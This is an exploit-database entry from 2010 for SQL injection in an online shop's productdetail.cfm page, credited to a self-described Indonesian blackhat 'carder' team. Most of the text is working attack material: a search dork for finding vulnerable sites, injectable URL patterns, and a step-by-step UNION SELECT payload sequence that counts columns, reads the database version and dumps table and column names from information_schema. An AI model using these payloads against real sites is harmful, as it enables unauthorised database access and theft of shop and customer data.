online product / shop online (productdetail.cfm) SQL Injection

2010-09-05T00:00:00
ID 1337DAY-ID-13975
Type zdt
Reporter Yogyacarderlink
Modified 2010-09-05T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            ==============================================================
online product / shop online (productdetail.cfm) SQL Injection
==============================================================

[+] Category	 :	vurnerebility SQLI online product	 	
[+] Running on	 :	ASP.Net
[+] Author 	 :	yogyacarderlink.web.id
[+] Contact	 : 	www.yogyacarderlink.web.id
[+] Dork	 :	productdetail.cfm?pid=
[+] date	 :	04-9-10

----------------------------------------------------------------------------------- 
POC :

http://www.DNSname.com/catalog/product-detail.cfm?pid=[SQLI]
http://www.DNSname.com/sproductdetail.cfm?ID=[SQLI]
http://www.DNSname.com/productdetail.cfm?ID=[SQLI]
http://www.DNSname.com/products/productdetail.cfm?productCategoryID=[SQLI]

/*| or |--
'| or | "-"
+order+by+1--   table check 
order+by+1/*	table check
order+by+2--	table check
order+by+3--	table check

[value]+union+select+1,2,3,4,5,6,7,8--
-[value]+order+by+[value]--

version() a/ @@version
[value]+union+select+1,2,3,4,version(),6,7,8-- |or
[value]+union+select+1,2,3,4,@@version,6,7,8--

table_name >>>
+from+information_schema.tables/* >>>
[value]+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables-- 

group_concat(table_name) >>>
+from+information_schema.tables+where+table_schema=database() >>>
[value]68+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--


group_concat(column_name) >>>
+from+information_schema.columns+where+table_name=0xhexa-- >>>
-[value]+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
-[value]+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=[hexa]--


biGthank to	    :	family "ALL yogyacarderlink"<--vivacarderlink|indonesian blackhat team
KeDai Computerworks,:   0n3-d4y,h3ndry_Slank,R0ck_in5t4n,r3d_h41r,n3ro,elzamario,neplaciano,awhie



#  0day.today [2018-04-01]  #